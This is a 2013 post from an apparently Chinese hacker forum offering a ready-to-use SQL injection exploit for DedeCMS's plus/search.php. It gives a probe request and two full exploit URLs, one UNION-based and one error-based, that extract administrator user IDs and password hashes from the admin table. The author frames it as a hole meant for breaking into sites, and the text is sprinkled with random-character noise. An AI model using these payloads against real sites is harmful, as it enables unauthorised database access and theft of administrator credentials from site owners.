找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2064|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ. v1 X$ c& {6 z

3 Q$ c. W( E  V; R8 ^" j哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。+ F5 e8 ]$ ]) T0 X( `9 w( e% e1 ?

2 G9 d2 r2 _( f既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
7 O; ^5 x/ g3 N( Y7 X. r/ s8 `! x% ~6 H
我一般是这样测试的:7 k; `( B4 ~7 [9 @* `& B5 F/ n

0 z) O, {- e5 ?5 x提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ I3 i* a, f5 A9 V/ r

/ _$ Q1 G2 K4 _2 [* r9 J0 u转载不加作者名的没JJ
3 J! y" k) l/ ?) A$ s7 Y; }  A, T0 u) v9 @+ v: i* U
作者:鬼哥
0 ~* J9 O+ b! _' ]7 n7 h1 B3 O2 w5 Z6 A# y* [0 i

1 R/ S3 E( Z0 l* n: z/ m2 J% a8 F/ i  j, S" Q$ ?, Q9 {/ k: W
看结果如果提示* z! t7 ?) f* ]1 J$ \4 V+ H
# m5 c. z2 U6 [% v( F2 @) O
Safe Alert: Request Error step 2 !' w9 B8 r* a. {' h6 C7 j
/ j; C, j+ ]/ K# B0 Z9 D
那么直接用下面的exp7 O6 J" }' R5 O( e% q

5 t# t# o0 p3 Axx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
; n5 |: D% G: r4 n
& z5 Z6 y7 X' m: x/ _; t" ^! Z/ Y8 F2 y! R. ^& i, {
看结果如果提示
4 n% a/ u4 D+ b7 X% M; j4 F; b* ~+ d9 h$ W( Z
Safe Alert: Request Error step 1 !
9 A/ }& [3 Z3 F
! L% H0 D% n8 m6 @4 W1 D  Q$ Z. J+ ~那么直接用下面的exp6 f8 \: K* `# O7 T0 u2 }
: y/ p! e; [1 \! O  m. [3 ?
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a9 w  _" i; L+ N: L% X+ p/ f4 f0 a
5 V. E# }) |$ S& Q1 ^

: D+ a( \  e; B1 V/ N) c! S  y( \如果正常显示证明漏洞不存在了。8 o7 X' S0 u1 Z; z7 d
3 G2 V2 }7 @- Q' q: N
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表